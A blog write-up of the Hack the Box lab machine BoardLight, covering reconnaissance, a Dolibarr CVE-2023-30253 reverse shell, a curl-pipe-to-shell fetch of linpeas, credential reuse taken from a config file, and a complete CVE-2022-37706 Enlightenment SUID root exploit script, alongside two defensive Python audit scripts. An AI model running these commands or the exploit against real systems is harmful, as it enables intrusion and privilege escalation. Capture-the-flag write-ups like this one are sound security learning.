Trance Shift 8 - Tech

Notes where I write up CTFs.

Writeup | Hack the Box: BoardLight

Publishing this now that Season 5 is over. Since it was my first season I only managed the EASY boxes, but I got through them with what I already knew.

HTB: BoardLight

echo "10.10.11.11 board.htb" | sudo tee -a /etc/hosts

nmap

# nmap -sC -A board.htb
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
|   256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
|_  256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Aggressive OS guesses: Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)
  • 22: SSH
  • 80: HTTP

Standard setup.

Web

  • http://boardlight.htb
    • Take a look with Burp on
    • One form: contact.php
    • action="" => not implemented?
    • There's no name attribute either, so it's probably not wired up
# There's a page that has been commented out
<!-- <a class="nav-link" href="portfolio.php"> Portfolio </a> -->

ffuf

# ffuf -w /usr/share/wordlists/dirb/common.txt -u http://board.htb/FUZZ.php
about                   [Status: 200, Size: 9100, Words: 3084, Lines: 281, Duration: 172ms]
contact                 [Status: 200, Size: 9426, Words: 3295, Lines: 295, Duration: 164ms]
do                      [Status: 200, Size: 9209, Words: 3173, Lines: 295, Duration: 291ms]
index                   [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 160ms]
# ffuf -w /usr/share/wordlists/dirb/common.txt -u http://board.htb/FUZZ
.htaccess               [Status: 403, Size: 274, Words: 20, Lines: 10, Duration: 156ms]
.hta                    [Status: 403, Size: 274, Words: 20, Lines: 10, Duration: 156ms]
                        [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 309ms]
.htpasswd               [Status: 403, Size: 274, Words: 20, Lines: 10, Duration: 157ms]
css                     [Status: 301, Size: 304, Words: 20, Lines: 10, Duration: 157ms]
images                  [Status: 301, Size: 307, Words: 20, Lines: 10, Duration: 156ms]
index.php               [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 2280ms]
js                      [Status: 301, Size: 303, Words: 20, Lines: 10, Duration: 156ms]
server-status           [Status: 403, Size: 274, Words: 20, Lines: 10, Duration: 165ms]
  • Nothing particularly suspicious
  • Maybe this isn't a web problem

CVE-2021-40438 => SSRF?

# whatweb -a 3 http://board.htb
http://board.htb [200 OK] Apache[2.4.41], Bootstrap[4.3.1], Country[RESERVED][ZZ], Email[info@board.htb], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.10.11.11], JQuery[3.4.1], Script[text/javascript], X-UA-Compatible[IE=edge]
# This is what the request looks like
GET http://board.htb/?unix:AA...AAAA|http://127.0.0.1:3000/
# run it with python
python3 CVE-2021-40438.py -t http://board.htb -ssrf http://10.10.16.22:8000 | head
  • Doesn't succeed; probably not this one...

Subdomain enumeration

The site mentions board.htb, so maybe there are subdomains too?

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt \
  -H "Host: FUZZ.board.htb" -u http://board.htb/ \
  -fs 15949
crm                     [Status: 200, Size: 6360, Words: 397, Lines: 150, Duration: 6241ms]

There it is.

echo "10.10.11.11 crm.board.htb" | sudo tee -a /etc/hosts

Dolibarr => CVE-2023-30253

Current login: admin
# nc -lnvp 4444
python3 exploit.py http://crm.board.htb admin admin 10.10.16.22 4444

yessss!

www-data@boardlight:~/html/crm.board.htb/htdocs/public/website$ pwd
pwd
/var/www/html/crm.board.htb/htdocs/public/website
www-data@boardlight:~/html/crm.board.htb/htdocs/public/website$ whoami
whoami
www-data
www-data@boardlight:~$ ls -la /home
ls -la /home
total 12
drwxr-xr-x  3 root    root    4096 May 17 01:04 .
drwxr-xr-x 19 root    root    4096 May 17 01:04 ..
drwxr-x--- 16 larissa larissa 4096 Jun 25 03:33 larissa

larissa looks like a user, but www-data can't get into that home directory.

linpeas

Look for files that www-data can access

# host it locally
# python3 -m http.server 8000
curl http://10.10.16.22:8000/linpeas.sh|sh
# lots of files owned by larissa
www-data@boardlight:~/html/board.htb$ ls -la
ls -la
total 72
drwxr-xr-x 5 www-data www-data  4096 May 17 01:04 .
drwxr-xr-x 4 www-data www-data  4096 May 17 01:04 ..
-rw-rw-r-- 1 larissa  larissa   9100 May 15 11:01 about.php
-rw-rw-r-- 1 larissa  larissa   9426 May 15 11:02 contact.php
drwxrwxr-x 2 larissa  larissa   4096 May 17 01:04 css
-rw-rw-r-- 1 larissa  larissa   9209 May 15 11:02 do.php
drwxrwxr-x 2 larissa  larissa   4096 May 17 01:04 images
-rw-rw-r-- 1 larissa  larissa  15949 May 15 11:02 index.php
drwxrwxr-x 2 larissa  larissa   4096 May 17 01:04 js
# MySQL seems to be up
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
# Backup file => nothing useful in it
-r-------- 1 www-data www-data 16394 May 13 13:20 /var/www/html/crm.board.htb/htdocs/conf/conf.php.old
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ ls -la
ls -la
total 56
drwxr-xr-x  2 www-data www-data  4096 May 17 00:18 .
drwxr-xr-x 79 www-data www-data  4096 Mar  4  2023 ..
-rw-r--r--  1 www-data www-data    31 Mar  4  2023 .htaccess
-rw-r--r--  1 www-data www-data  1736 May 17 00:18 conf.php
-rw-r--r--  1 www-data www-data 16394 Mar  4  2023 conf.php.example
-r--------  1 www-data www-data 16394 May 13 13:20 conf.php.old
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ pwd
pwd
/var/www/html/crm.board.htb/htdocs/conf
# conf.php
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
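The conf directory above keeps a conf.php.old next to the live config, owned by www-data and mode 0400, which means the web service account (and anything running as it) can still read it. That pattern, a backup or template copy of a config file left readable by the web user, is worth checking for on every webroot. The following Python is an added example, not part of the original writeup or of Dolibarr: it walks a directory tree for backup-style copies of config files, checks with POSIX mode bits whether a given uid/gid can read them, and reports those that still carry credential-looking assignments. The suffix list, the secret-name regex and the sample directory that demo() builds are assumptions constructed for the example; the password in it is a placeholder.

```python
import os
import re
import stat
import tempfile

# Suffixes that usually mark a backup or template copy of a live config file.
BACKUP_SUFFIXES = (".old", ".bak", ".orig", ".save", ".example", "~")

# PHP-style assignments whose variable name suggests a credential, such as
# $dolibarr_main_db_pass='...'; the value must be non-empty to count.
SECRET_RE = re.compile(
    r"(\$\w*(?:pass|passwd|password|secret|token|key)\w*)\s*=\s*['\"][^'\"]+['\"]",
    re.IGNORECASE,
)


def readable_by(st, uid, gid):
    """Plain mode-bit check: can an account with this uid/gid read the file?
    POSIX semantics: owner bits apply if the uid matches, else group bits if
    the gid matches, else the other bits. ACLs and capabilities are ignored."""
    mode = stat.S_IMODE(st.st_mode)
    if uid == 0:
        return True
    if st.st_uid == uid:
        return bool(mode & stat.S_IRUSR)
    if st.st_gid == gid:
        return bool(mode & stat.S_IRGRP)
    return bool(mode & stat.S_IROTH)


def find_exposed_config_backups(root, web_uid, web_gid):
    """Walk ROOT and return (path, mode, secret_keys) for backup/template
    files that the web service account can read and that still contain
    credential-looking values."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(BACKUP_SUFFIXES):
                continue
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode) or not readable_by(st, web_uid, web_gid):
                continue
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    keys = sorted({m.group(1) for m in SECRET_RE.finditer(fh.read())})
            except OSError:
                continue
            if keys:
                findings.append((path, oct(stat.S_IMODE(st.st_mode)), keys))
    return sorted(findings)


def demo():
    """Build a throwaway Dolibarr-like htdocs/conf directory (constructed
    sample data, placeholder password) and audit it with the current user
    standing in for www-data. Returns findings with paths relative to the tree."""
    with tempfile.TemporaryDirectory() as root:
        conf = os.path.join(root, "htdocs", "conf")
        os.makedirs(conf)
        live = ("<?php\n$dolibarr_main_db_user='dolibarrowner';\n"
                "$dolibarr_main_db_pass='PLACEHOLDER_DB_PASSWORD';\n")
        samples = {
            "conf.php": (live, 0o644),         # live config: not a backup, out of scope here
            "conf.php.old": (live, 0o400),     # owner-only backup, still readable by the web user
            "conf.php.example": ("<?php\n$dolibarr_main_db_pass='';\n", 0o644),  # empty template
        }
        for name, (body, mode) in samples.items():
            path = os.path.join(conf, name)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(body)
            os.chmod(path, mode)
        findings = find_exposed_config_backups(root, os.getuid(), os.getgid())
        return [(os.path.relpath(p, root), mode, keys) for p, mode, keys in findings]


if __name__ == "__main__":
    for path, mode, keys in demo():
        print(f"{path} ({mode}): {', '.join(keys)}")
```

The mode-bit check is deliberately independent of who runs the scan, so the audit can be run as root and still answer "what can www-data read". Only the backup copy is reported: the live config is readable by design, the point is that stale copies tend to keep the live credentials while falling outside whatever protects the real file.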

MySQL

# serverfun2$2023!!
mysql -u dolibarrowner -p dolibarr

# account table
SHOW TABLES;
=> llx_user

# \G => print each row vertically
SELECT * FROM llx_user\G

*************************** 1. row ***************************
                       rowid: 1
...
                       login: dolibarr
                pass_crypted: $2y$10$VevoimSke5Cd1/nX1Ql9Su6RstkTRe7UX1Or.cm8bZo56NjCMJzCm
                   pass_temp: NULL
                     api_key: NULL
                    lastname: SuperAdmin
*************************** 2. row ***************************
                       rowid: 2
...
                       login: admin
                pass_crypted: $2y$10$gIEKOl7VZnr5KLbBDzGbL.YuJxwz5Sdl5ji3SEuiUSlULgAhhjH96
                   pass_temp: NULL
                     api_key: yr6V3pXd9QEI
                    lastname: admin
  • $2y$10$ => bcrypt
# => failed (hash single-quoted so the shell does not expand the $ characters)
hashcat -m 3200 '$2y$10$gIEKOl7VZnr5KLbBDzGbL.YuJxwz5Sdl5ji3SEuiUSlULgAhhjH96'

user

  • The password serverfun2$2023!! must be a hint
    • Tried logging in as larissa with it and got in
ssh larissa@board.htb
The authenticity of host 'board.htb (10.10.11.11)' can't be established.
ED25519 key fingerprint is SHA256:xngtcDPqg6MrK72I6lSp/cKgP2kwzG6rx2rlahvu/v0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'board.htb' (ED25519) to the list of known hosts.
larissa@board.htb's password: 
Last login: Tue Jun 25 03:12:56 2024 from 10.10.14.116
larissa@boardlight:~$
larissa@boardlight:~$ cat user.txt
XXXX

linpeas again

  • Not in sudoers
larissa@boardlight:~$ id
uid=1000(larissa) gid=1000(larissa) groups=1000(larissa),4(adm)
larissa@boardlight:~$ sudo -l
[sudo] password for larissa: 
Sorry, user larissa may not run sudo on localhost.

Look at the earlier linpeas results again

╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid               
-rwsr-xr-x 1 root root 15K Jul  8  2019 /usr/lib/eject/dmcrypt-get-device                      
-rwsr-sr-x 1 root root 15K Apr  8 18:36 /usr/lib/xorg/Xorg.wrap
-rwsr-xr-x 1 root root 27K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys (Unknown SUID binary!)                                                                
-rwsr-xr-x 1 root root 15K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd (Unknown SUID binary!)                                                           
-rwsr-xr-x 1 root root 15K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight (Unknown SUID binary!)                                                          
-rwsr-xr-x 1 root root 15K Jan 29  2020 /usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset (Unknown SUID binary!)

Something called enlightenment_sys looks suspicious

Enlightenment => the machine is called BoardLight, so this is probably it
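linpeas marks the Enlightenment helpers as "Unknown SUID binary!" because they are not on its built-in list of setuid files a stock distribution ships. The same check is cheap to run as a scheduled host audit: list every file with the setuid or setgid bit, compare it with a recorded baseline, and alert on anything new. The Python below is an added example, not part of the writeup or of linpeas. The EXPECTED_SETID baseline is an assumption for illustration (derive the real one from a clean reference image), SAMPLE_ENTRIES is constructed from the linpeas listing above, and the /opt/tool entry is hypothetical.

```python
import os
import stat

# Baseline of set-id files expected on a stock Ubuntu 20.04 host. This set is
# an assumption for the example: record the real one from a clean reference
# image (for instance by running walk_files() there) and keep it under
# version control.
EXPECTED_SETID = {
    "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/passwd", "/usr/bin/chsh",
    "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/mount",
    "/usr/bin/umount", "/usr/bin/fusermount", "/usr/bin/pkexec",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/openssh/ssh-keysign",
}


def classify_setid(entries, baseline=EXPECTED_SETID):
    """entries: iterable of (path, st_mode, st_uid). Returns a sorted list of
    (path, owner_uid, bits) for regular files carrying the setuid or setgid
    bit that are not on the baseline; bits is 'suid', 'sgid' or 'suid+sgid'."""
    flagged = []
    for path, mode, uid in entries:
        if not stat.S_ISREG(mode):
            continue
        bits = []
        if mode & stat.S_ISUID:
            bits.append("suid")
        if mode & stat.S_ISGID:
            bits.append("sgid")
        if not bits or path in baseline:
            continue
        flagged.append((path, uid, "+".join(bits)))
    return sorted(flagged)


def walk_files(root="/"):
    """Yield (path, st_mode, st_uid) for every file under root, skipping the
    pseudo-filesystems; feed the result to classify_setid() for a live scan."""
    skip = {"/proc", "/sys", "/dev", "/run"}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in skip]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            yield path, st.st_mode, st.st_uid


# Constructed sample: the files linpeas listed on the box, with mode bits
# transcribed from its ls-style output, plus two controls.
ENL = "/usr/lib/x86_64-linux-gnu/enlightenment"
SAMPLE_ENTRIES = [
    ("/usr/bin/sudo", 0o104755, 0),                              # on the baseline
    ("/usr/lib/eject/dmcrypt-get-device", 0o104755, 0),          # -rwsr-xr-x
    ("/usr/lib/xorg/Xorg.wrap", 0o106755, 0),                    # -rwsr-sr-x
    (f"{ENL}/utils/enlightenment_sys", 0o104755, 0),
    (f"{ENL}/utils/enlightenment_ckpasswd", 0o104755, 0),
    (f"{ENL}/utils/enlightenment_backlight", 0o104755, 0),
    (f"{ENL}/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset", 0o104755, 0),
    ("/home/larissa/user.txt", 0o100640, 1000),                 # no set-id bit: ignored
    ("/opt/tool", 0o104755, 1000),                               # hypothetical: setuid to a non-root user
]


def audit_sample():
    """Run the classifier over the constructed sample."""
    return classify_setid(SAMPLE_ENTRIES)


if __name__ == "__main__":
    for path, uid, bits in audit_sample():
        print(f"{bits:9s} uid={uid:<5d} {path}")
```

Flagging by path only is intentional for a first pass; a stricter version records (path, owner, mode, file hash) in the baseline so that a replaced binary or a newly added bit shows up even when the path is expected. Non-root set-id files are reported too, since a setuid binary owned by a service account is still a privilege boundary.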

Work through it as follows

# check
larissa@boardlight:~/tmp$ file /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=c32a8a1b279ba209d1029c51435d64b86ca09b8b, for GNU/Linux 3.2.0, stripped
# running it gives no output => OK
larissa@boardlight:~/tmp$ /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
larissa@boardlight:~/tmp$ 
# help => OK
larissa@boardlight:~/tmp$ /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys --help
This is an internal tool for Enlightenment.
do not use it.
# strace
larissa@boardlight:~/tmp$ strace /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys 2>&1 | grep open
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libeina.so.1", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libecore.so.1", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libbluetooth.so.3", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libpthread.so.0", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libm.so.6", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/librt.so.1", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libdl.so.2", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libsystemd.so.0", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libunwind-x86_64.so.8", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libunwind.so.8", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libeo.so.1", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libefl.so.1", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libglib-2.0.so.0", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/liblzma.so.5", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/liblz4.so.1", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libgcrypt.so.20", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libpcre.so.3", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libgpg-error.so.0", O_RDONLY|O_CLOEXEC) = 3
# strace exec
larissa@boardlight:~/tmp$ strace /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys 2>&1 | grep exec
execve("/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys", ["/usr/lib/x86_64-linux-gnu/enligh"...], 0x7ffc29275890 /* 18 vars */) = 0

The execve syscall succeeds

larissa@boardlight:~/tmp$ cat ex.sh 
#!/bin/bash

echo "CVE-2022-37706"
echo "[*] Trying to find the vulnerable SUID file..."
echo "[*] This may take few seconds..."

file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
if [[ -z ${file} ]]
then
        echo "[-] Couldn't find the vulnerable SUID file..."
        echo "[*] Enlightenment should be installed on your system."
        exit 1
fi

echo "[+] Vulnerable SUID binary found!"
echo "[+] Trying to pop a root shell!"
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"

echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
echo "[+] Enjoy the root shell :)"
${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net
larissa@boardlight:~/tmp$ sh ex.sh 
CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
ex.sh: 8: [[: not found
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
[+] Enjoy the root shell :)
mount: /dev/../tmp/: can't find in /etc/fstab.
# whoami
root
# cd /root/
# ls
root.txt  snap
# cat root.txt
XXXX

got it!